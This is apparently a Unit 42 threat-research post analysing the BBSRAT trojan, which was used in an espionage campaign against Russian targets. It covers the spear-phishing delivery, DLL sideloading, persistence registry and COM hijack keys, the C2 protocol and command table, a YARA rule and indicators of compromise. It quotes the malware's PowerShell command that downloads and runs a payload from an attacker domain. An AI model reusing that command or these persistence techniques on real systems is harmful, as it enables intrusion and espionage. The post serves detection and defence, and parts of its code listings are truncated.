### 27 **family.** **ESET did not attribute the attacks to a particular attack group, but noted that the objective of the** **campaign was espionage and general information stealing. Based on data collected from Palo** **[Alto Networks AutoFocus threat intelligence, we discovered continued operations of activity very](https://www.paloaltonetworks.com/products/platforms/subscriptions/autofocus.html)** **similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe, with a** **concentration of attacks in late October and continuing into December.** **The adversaries behind these attacks continued to target Russia and other Russian speaking** **nations using similar exploits and attack vectors. However, while the malware used in these new** **attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own** **specific behavior patterns and architecture. We have named this tool “BBSRAT.”** **As described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used** **weaponized exploit documents that leave Russian language decoy document files after infecting** **the system. The files exploit the well-known Microsoft Office vulnerability, CVE-2012-0158, to** **execute malicious code in order to take control of the targeted systems.** **Figure 1 Spear-phishing email delivering BBSRAT** **In one case, the adversary impersonated an individual from the organization Vigstar, a Russian-** **based research organization in charge of the development of satellite communications and** **special purpose wireless devices for the Russian Federation’s defense and security agencies.** **The targeted email address appeared to be a Gmail account associated with Vigstar as well,** **and was found on a job board website for a job opening at Vigstar.** **The rough translation of the body of the email is as follows:** **_I send you a “list of international exhibitions of military, civil and dual-purpose, conducted in_** **_2015 on the territory of the Russian Federation and foreign states.” Waiting for your reply!_** **Figure 2 confirms that the decoy document that opens after the malware infects the system is** **indeed a list of international exhibitions that were conducted on Russian territory in 2015.** |Col1|POSTED BY: Bryan Lee and Josh Grunzweig on December 22, 2015 5:00 PM| |---|---| |27|| |LLiikkee|FILED IN: Malware, Unit 42 TAGGED: AutoFocus, BBSRAT, Microsoft Office, PlugX, Roaming Tiger In late 2014, ESET presented an attack campaign that had been observed over a period of time targeting Russia and other Russian speaking nations, dubbed “Roaming Tiger”. The attack was found to heavily rely on RTF exploits and at the time, thought to make use of the PlugX malware| |Tweet|| |4|| **Get Updates** **Sign up to receive the latest news, cyber** **threat intelligence and research from Unit** **42.** **Business Email** **Submit** **LikeLike** ----- **Figure 2 Decoy document that is opened after the malicious document has infected the system** **In more recent months, we have identified several other potential Russian victims using** **AutoFocus. Analysis of the command and control (C2) infrastructure shows that the newly** **discovered samples of BBSRAT used the same C2 domains as previously published in the** **“Roaming Tiger” campaign, including transactiona[.]com and futuresgold[.]com. Interestingly, all** **of the previously published C2 domains have significant overlap amongst the hashes and IPs** **while C2s for BBSRAT contain no overlap at all. This may indicate that for the newer attack** **campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or** **infrastructure for each of the intended targets.** **Figure 3 Command and control infrastructure** **BBSRAT is typically packaged within a portable executable file, although in a few of the** **observed instances, a raw DLL was discovered to contain BBSRAT. When the dropper first runs,** **it will generate a path in the %TEMP% directory. The generated filename is 10-16 uppercase** **alphabetic characters, and ends with a ‘.TMP’ file extension. The dropper will continue to write** **an embedded cab file in this location.** ----- **%ALLUSERSPROFILE%\SSONSVR** **%ALLUSERSPROFILE%\Application Data\SSONSVR** **[Using the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the](https://support.microsoft.com/en-us/kb/80751)** **following command, which will expand the CAB file and write the results to the provided** **directory:** **_expand.exe “%TEMP%\[temp_file]” Destination “[chosen_path]\SSONSVR”_** **This results in the following three files being written to the SSONSVR directory:** **aclmain.sdb** **pnipcn.dll** **ssonsvr.exe** **[The ‘ssonsvr.exe’ file is a legitimate Citrix executable that will be used to sideload the malicious](https://attack.mitre.org/wiki/DLL_side-loading)** **‘pnipcn.dll’ file. The ‘aclmain.sdb’ file contains code that will eventually be loaded by the** **‘pnipcn.dll’ file.** **[The malware finally executes ‘ssonsvr.exe’ via a call to ShellExecuteW.](https://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx)** **Figure 5 Execution flow of dropper expanding CAB file** **When ‘ssonsvr.exe’ is executed, and the pnipcn.dll file is loaded, it will begin by identifying the** **path to msiexec.exe, by expanding the following environment string:** **_%SystemRoot%\System32\msiexec.exe_** **It will then spawn a suspended instance of msiexec.exe in a new process. The malware** **proceeds to load code from the ‘aclmain.sdb’ file and performs process hollowing against this** **instance of msiexec.exe prior to resuming the process.** **Figure 6 Sideloading execution flow** **In order to ensure persistence, the following registry key is written on the victim’s machine:** **_HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe :_** **_[path_to_ssonsvr.exe]_** **In the most recently observed sample of BBSRAT found in AutoFocus, the Trojan was deployed** **[via a downloader that used the Invoke-ReflectivePEInjection.ps1 script from the PowerSploit](https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1)** **framework.** **When the downloader executes, it will first decrypt the following two strings using a 5-byte XOR** **key of “\x01\x02\x03\x04\x05”:** **_“powershell -exec bypass -c IEX (New-Object_** **_Net.WebClient).DownloadString(‘http://testzake[.]com/IR.ps1′);Invoke-ReflectivePEInjection -_** **_PEUrl http://testzake[.]com/s.exe”_** **_“C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell -exec bypass -c IEX (New-_** **_Object Net.WebClient).DownloadString(‘http://testzake[.]com/IR.ps1′);Invoke-_** **_ReflectivePEInjection -PEUrl http://testzake[.]com/s.exe”_** **These strings are then sequentially executed via calls to WinExec. As we can see, the second** **command is specifically crafted to run on 64-bit versions of Microsoft Windows. The commands** **in question will download an executable file and run it within the context of the powershell** **process.** **When the above commands are executed, the downloader will initially download the ‘IR.ps1’** **powershell script from the specified URL:** ----- **Figure 7 Downloader downloading the Invoke-ReflectivePEInjection PowerSploit script** **This Powershell script appears to have been pulled directly from the PowerSploit framework,** **with no modifications made. The malware then invokes this script with a URL that points to an** **additional executable file. This downloaded executable contains a copy of the BBSRAT malware** **family.** **The downloader proceeds to drop either a 32-bit or 64-bit DLL file that will execute the two** **previously stated Powershell commands when the DLL is loaded. This DLL is dropped to one of** **the following locations:** **_%SYSTEMROOT%\web\srvcl32.dll_** **_%APPDATA%\web\srvcl32.dll_** **Additionally, the following registry keys are set depending on the system’s CPU architecture:** **_HKU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-_** **_0c966feabec1}\InprocServer32\ThreadingModel – “Both”_** **_HKU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-_** **_0c966feabec1}\InprocServer32\Default – [path_to_srvcl32.dll]_** **_HKLM\SOFTWARE\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-_** **_85FFC23AF9C1}\InprocServer32\ThreadingModel – “Both”_** **_HKLM\SOFTWARE\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-_** **_85FFC23AF9C1}\InprocServer32\Default – [path_to_srvcl32.dll]_** **The COM object for {42aedc87-2188-41fd-b9a3-0c966feabec1} is specific to ‘MruPidlList’, while** **the COM object for {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} is specific to ‘Microsoft** **WBEM New Event Subsystem’. This ensures that the DLL specified will load when Microsoft** **[Windows starts. It is a technique that was used by the ZeroAccess rootkit when it initially](https://nakedsecurity.sophos.com/2012/06/06/zeroaccess-rootkit-usermode/)** **surfaced.** **After being loaded using one of the two techniques discussed, BBSRAT malware begins** **execution by loading the following libraries at runtime:** **ntdll.dll** **kernel32.dll** **user32.dll** **advapi32.dll** **gdi32.dll** **ws2_32.dll** **shell32.dll** **psapi.dll** **Secur32.dll** **WtsApi32.dll** **Netapi32.dll** **Version.dll** **Crypt32.dll** **Wininet.dll** **The following mutex is then created to ensure a single instance of BBSRAT is running at a given** **time:** **_Global\GlobalAcProtectMutex_** **Throughout the execution of BBSRAT, it will dynamically load functions prior to calling them, as** **seen in the example below demonstrating BBSRAT making a call to the WSAStartup function:** ----- **Figure 8 BBSRAT calling WSAStartup function** **The malware proceeds to parse the stored embedded network configuration and spawns a** **series of threads responsible for network communication. This includes a series of HTTP or** **HTTPS requests, such as the following:** **_GET /bbs/1/forum.php?sid=1 HTTP/1.1_** **_Cookie: A46A8AA9-D7D6-43FB-959DC96E_** **_Content-Length:_** **_User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1)_** **_Connection: Keep-Alive_** **_Host: transactiona[.]com_** **_Cache-Control: no-cache_** **_Accept: */*_** **_Content-Type:_** **In the above example, the ‘1’ used both in the URI and the sid GET parameter is a global** **incremental counter. Every subsequent request made by BBSRAT increments this counter by** **one. Additionally, all variants of BBSRAT we have found use the same URL for command and** **control (C2) communication.** **When first executed, the malware will exfiltrate data about the victim’s machine via a POST** **request to the ‘/bbs/[counter]/forum.php?sid=[counter]’ URL. All network data sent via POST** **requests uses a custom binary structure, as defined as the following:** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **struct** **network_header** **{** **DWORD random;** **DWORD hardcoded0;** **DWORD hardcoded1;** **DWORD command;** **DWORD length_of_compressed_data;** **DWORD length_of_decompressed_data;** **DWORD unknown2;** **BYTE** **compressed_data[];** **};** **The compressed_data field is compressed using the common ZLIB compression algorithm.** **Additionally, in the event data is being sent via HTTP rather than HTTPS, the following** **additional encryption algorithm is applied to the POST data:** **1** **2** **3** **4** **5** **6** **7** **8** **def decrypt(data):** **out = []** **for** **x** **in** **data:** **t = (ord(x) - 23)** **t1 = (t ^ 62)** **t2 = (t1 + 23) & 0xFF** **out.append(chr(t2))** **return** **out** **The following data structure holds the victim’s information that is uploaded by BBSRAT:** ----- **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **19** **20** **21** **22** **23** **24** **_** **;** **DWORD major_version;** **DWORD minor_version;** **DWORD build_number;** **DWORD platform_id;** **DWORD default_locale;** **DWORD unknown;** **DWORD local_ip_address;** **DWORD running_as_64_bit;** **DWORD random;** **DWORD unknown2;** **DWORD struct_length;** **DWORD struct_with_not_used_length;** **DWORD struct_with_username_length;** **DWORD struct_with_group_length;** **DWORD unknown3;** **DWORD struct_with_hostname_length;** **WCHAR not_used[??];** **WCHAR username[??];** **WCHAR group[??];** **WCHAR hostname[??];** **};** **BBSRAT accepts many possible commands that the C2 server can provide. These commands** **are sent as a response to the GET beacons that are continually requested via either HTTP or** **HTTPS. The following commands and sub-commands have been identified:** **Command** **Sub-** **command** **Description** **0x110010** **N/A** **Beacon** **0x110011** **N/A** **Uninstall/Kill Malware** **0x110020** **N/A** **Upload Victim Information** **0x110064** **0x2** **Execute Command and Return Response** **0x110064** **0x4** **Unknown** **0x110064** **0x5** **Execute Shellcode** **0x110066** **0x7** **Query Service Configuration** **0x110066** **0x9** **Start Service** **0x110066** **0xa** **Stop Service** **0x110066** **0xb** **Delete Service** **0x110066** **0xc** **Change Service Configuration** **0x110063** **0xd** **Enumerate Running Processes** **0x110063** **0xf** **Kill Process** **0x110063** **0x10** **Get Process Information** **0x110063** **0x12** **Free Library for Specified Process** **0x110065** **0x1b** **Execute Command Quietly** **0x110065** **0x1e** **Send Input to Console** **0x110065** **0x1f** **Execute Shellcode** **0x110061** **0x20** **List Drive Information** **0x110061** **0x21** **List File Information For Given Directory** **0x110061** **0x23** **Write File** **0x110061** **0x24** **Read File** **0x110061** **0x25** **List File Information For Given Directory** **0x110061** **0x27** **Perform File Operation via SHFileOperation()** **0x110061** **0x28** **Delete File** **0x110061** **0x29** **Create Directory** **0x110061** **0x2a** **Shell Execute** **Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2** **servers.** **As in many of the previous articles regarding espionage-motivated adversaries and possible** **nation-state campaigns, what is being observed in this attack campaign is a continued operation** **and evolution by the adversary even after its tactics, techniques, and procedures (TTPs) have** **become public knowledge. Despite the fact that the information about these attackers has been** **public for over a year, including a listing of many of the command and control servers, they** **continue to reuse much of their exposed playbook. We urge organizations to use the data from** **Unit 42 and other threat intelligence sources is paramount to proactively secure themselves and** **prevent attacks.** **[WildFire properly classifies BBSRAT malware samples as malicious. We have released DNS](https://www.paloaltonetworks.com/products/technologies/wildfire.html)** **signatures to block access to the C2 domain names included in this report. AutoFocus users** **[can explore these attacks using the BBSRAT malware family tag.](https://autofocus.paloaltonetworks.com/#/tag/Unit42.BBSRAT)** ----- **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **19** **20** **rule** **bbsrat** **{** **meta:** **author = "Tyler Halfpop"** **company = "Palo Alto Networks"** **last_updated = "12-16-15"** **strings:** **$sa0 = "%ALLUSERSPROFILE%\\SSONSVR"** **fullword wide** **$sa1 = "%ALLUSERSPROFILE%\\Application Data\\SSONSVR"** **fullword wi** **$sa2 = "\\ssonsvr.exe"** **fullword wide** **$oa0 = {** **83** **E8** **01** **88** **0C** **04** **75** **F8** **8B** **44** **24** **40** **89** **4C** **24** **18** **89** **4C** **24** **1** **$oa1 = {** **75** **11** **5F** **5E** **B8** **0D** **00** **00** **00** **5B** **81** **C4** **??** **07** **00** **00** **C2** **10** **00** **5** **$sb0 = "%systemroot%\\Web\\"** **$sb1 = "srvcl32.dll"** **$ob0 = {** **B8** **67** **66** **66** **66** **F7 E9 D1 FA** **8B** **C2 C1 E8** **1F** **03** **C2** **8D** **04** **80** **$ob1 = {** **8D** **84** **24** **18** **02** **00** **00** **50** **C7** **84** **24** **1C** **02** **00** **00** **94** **00** **00** **00** **F** **condition:** **uint16(0) == 0x5a4d** **and** **filesize < 300KB** **and** **(all of** **($sa*)** **or** **al** **}** **MD5** **EF5FA2378307338D4E75DECE88158D77 (Sample Analyzed)** **SHA1** **574230D89EABDE0B6F937CD718B3AD19BB4F5CE3** **SHA256** **FC4B465EE8D2053E9E41FB0A6AE32843E4E23145845967A069E584F582279725** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2014-12-26 17:17:00 UTC** **HTTPS** **transactiona[.]com** **financenewsru[.]net** **MD5** **2254A1CA05DB87D9D58A71DDB97C7395** **SHA1** **65B17D3FF68D25392A9B0B9E25A275540DFB4E8D** **SHA256** **567A5B54D6C153CDD2DDD2B084F1F66FC87587DD691CD2BA8E30D689328A673F** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-11-04 07:14:33 UTC** **HTTPS** **jowwln[.]cocolco[.]com** **pagbine[.]ofhloe[.]com** **cdaklle[.]housejjk[.]com** **MD5** **74A41C62D9EC1164AF82B802DA3E8B3E** **SHA1** **D390E0965823E42584F2799EF0E8161A6540AF3E** **SHA256** **77A2E26097285A794E42C9E813D14936D0E7A1DD3504205DD6B28A71626F8C3C** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-11-04 07:14:33** **HTTPS** **kop[.]gupdiic[.]com** **MD5** **C17534E4B61C08A7646CDC64574B429B** **SHA1** **931BAB999568C228616430A5AEDFEDFC34E1F151** **SHA256** **61A692E615E31B97B47A215479E6347FBD8E6E33D7C9D044766B4C1D1AE1B1FB** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-11-04 07:14:33 UTC** **HTTPS** **herman[.]eergh[.]com** ----- **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **N/A** **HTTP** **211.44.42[.]55** **MD5** **0EA888E970345B2FBFD74B369FE46DDD** **SHA1** **EB4F9BDE2FFAE863E0D7AD5848A758D59224C3F7** **SHA256** **56D878EDD61176CA30D4A41555671161158E94E8A50E5482985F42C4E4843CB5** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-08-25 09:33:57 UTC** **HTTPS** **crew[.]wichedgecrew[.]com** **blueway[.]garmio-drive[.]com** **helloway[.]floretdog[.]com** **MD5** **FA944818A939456A7B6170326C49569F** **SHA1** **0EB3AE28A7A7D97ABA30DA4E8EB0A4AB36EFD035** **SHA256** **22592A32B1193587A707D8B20C04D966FE61B37F7DEF7613D9BB91FF2FE9B13B** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-08-25 09:33:57 UTC** **HTTPS** **panaba[.]empleoy-plan[.]com** **kop[.]gupdiic[.]com** **peak[.]measurepeak[.]com** **MD5** **896691AE546F498404F5884607D6EB50** **SHA1** **91A176EB5B2436762B9898075EC66042E33615A3** **SHA256** **13D0BD83A023712B54C1DD391DFC1BC27B22D9DF4FE3942E2967EC82D7C95640** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **N/A** **HTTP** **211.44.42[.]55** **MD5** **A78B9438117963A9A18B2F056888498B** **SHA1** **98E79C065DB88B4686AB5B7C36C4524333D64C48** **SHA256** **E049BD90028A56B286F4B0B9062A8DF2AB2DDF492764E3962F295E9CE33660E3** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2014-12-26 17:17:00 UTC** **HTTP** **211.44.42[.]55** **support.yandexmailru[.]kr** **MD5** **B4927EAC9715014E17C53841FEEDF4E1** **SHA1** **26E8CFD13175B67C12FC72A11FBDBC749F0B61C0** **SHA256** **2D81D65D09BF1B864D8964627E13515CEE7DEDDFBD0DC70B1E67F123AB91421E** **Compile** **Time** **2014-12-26 17:17:00 UTC** **Network** **HTTPS** ----- **panaba[.]empleoy-plan[.]com** **peak[.]measurepeak[.]com** **MD5** **41A02CAF0A0D32FAD5418425F9973616** **SHA1** **CC83EA6EF4763F24193D56359590BB34127DD36E** **SHA256** **7438ED5F0FBE4B26AFED2FE0E4E4531FC129A44D8EA416F12A77D0C0CD873520** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-08-25 09:33:57 UTC** **HTTPS** **herman[.]eergh[.]com** **prdaio[.]unbrtel[.]com** **loomon[.]gupdicc[.]com** **MD5** **AA59EE1E40D22BD22CEE19B8B6A17DF3** **SHA1** **963E0AD3EC717253A8E74F45D3C552107D6ECACA** **SHA256** **6FAE5305907CE99F9AB51E720232EF5ACF1950826DB520A847BF8892DC9578DE** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2014-12-26 17:17:00 UTC** **HTTPS** **winwordupdate[.]dynu[.]com** **MD5** **B934BF027EC3A9DFCAE9D836D68BAB75** **SHA1** **E9744516E621B233C44F5854C0DF63FFDD62FB81** **SHA256** **0BAF36CA2D3772FDFF989E2B7E762829D30DB132757340725BB50DEE3B51850C** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2014-12-26 17:17:00 UTC** **HTTPS** **transactiona[.]com** **financenewsru[.]net** **MD5** **7533E65A16B4B3BA451A141F389D3A30** **SHA1** **CB46E6234DA0A9C859C1F71FFEB86100284A0142** **SHA256** **D579255852720D794349AE2238F084C6393419AF38479F3D0E3D2A21C9EB8E18** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2014-12-26 17:17:00 UTC** **HTTPS** **winwordupdate[.]dynu[.]com** **adobeflashupdate1[.]strangled[.]net** **MD5** **8CD233D3F226CB1BF6BF15ACA52E0E36** **SHA1** **B955CA4AA8F7181C2252C4699718F6FEFC0B9CE3** **SHA256** **95F198ED29CF3F7D4DDD7CF688BFEC9E39D92B78C0A1FD2288E13A92459BDB35** **Compile** **Time** **Network** **Protocol** **C2** **Server(s)** **2015-09-22 06:16:44 UTC** **HTTP** **www[.]testzake[.]com** **MD5** **0AA391DC6D9EBEC2F5D0EE6B4A4BA1FA** ----- **Time** **Network** **Protocol** **C2** **Server(s)** **HTTP** **www[.]testzake[.]com** **61a692e615e31b97b47a215479e6347fbd8e6e33d7c9d044766b4c1d1ae1b1fb** **22592a32b1193587a707d8b20c04d966fe61b37f7def7613d9bb91ff2fe9b13b** **2d81d65d09bf1b864d8964627e13515cee7deddfbd0dc70b1e67f123ab91421e** **d579255852720d794349ae2238f084c6393419af38479f3d0e3d2a21c9eb8e18** **0fc52c74dd54a97459e964b340d694d8433a3229f61e1c305477f8c56c538f27** **567a5b54d6c153cdd2ddd2b084f1f66fc87587dd691cd2ba8e30d689328a673f** **95f198ed29cf3f7d4ddd7cf688bfec9e39d92b78c0a1fd2288e13a92459bdb35** **6fae5305907ce99f9ab51e720232ef5acf1950826db520a847bf8892dc9578de** **b1737f3a1c50cb39cd9938d5ec3b4a6a10b711f17e917886481c38967b93e259** **71dc584564b726ed2e6b1423785037bfb178184419f3c878e02c7da8ba87c64d** **4ea23449786b655c495edf258293ac446f2216464b3d1bccb314ef4c61861101** **0baf36ca2d3772fdff989e2b7e762829d30db132757340725bb50dee3b51850c** **012ec51657d8724338a76574a39db4849579050f02c0103d46d406079afa1e8b** **e049bd90028a56b286f4b0b9062a8df2ab2ddf492764e3962f295e9ce33660e3** **77a2e26097285a794e42c9e813d14936d0e7a1dd3504205dd6b28a71626f8c3c** **5aa7db3344aa76211bbda3eaaccf1fc1b2e76df97ff9c30e7509701a389bd397** **fc4b465ee8d2053e9e41fb0a6ae32843e4e23145845967a069e584f582279725** **44171afafca54129b89a0026006eca03d5307d79a301e4a8a712f796a3fdec6e** **7438ed5f0fbe4b26afed2fe0e4e4531fc129a44d8ea416f12a77d0c0cd873520** **13d0bd83a023712b54c1dd391dfc1bc27b22d9df4fe3942e2967ec82d7c95640** **adobeflashupdate.dynu[.]com** **adobeflashupdate1.strangled[.]net** **cdaklle.housejjk[.]com** **futuresgolda[.]com** **herman.eergh[.]com** **jowwln.cocolco[.]com** **kop.gupdiic[.]com** **loomon.gupdiicc[.]com** **pagbine.ofhloe[.]com** **panaba.empleoy-plan[.]com** **peak.measurepeak[.]com** **prdaio.unbrtel[.]com** **support.yandexmailru[.]kr** **systemupdate5.dtdns[.]net** **testzake[.]com** **transactiona[.]com** **wap.gxqtc[.]com** **wap.hbwla[.]com** **wap.kylxt[.]com** **windowsupdate.dyn[.]nu** **winwordupdate.dynu[.]com** **www.testzake[.]com** **www.yunw[.]top** ### Name * Email * ----- # Post Comment -----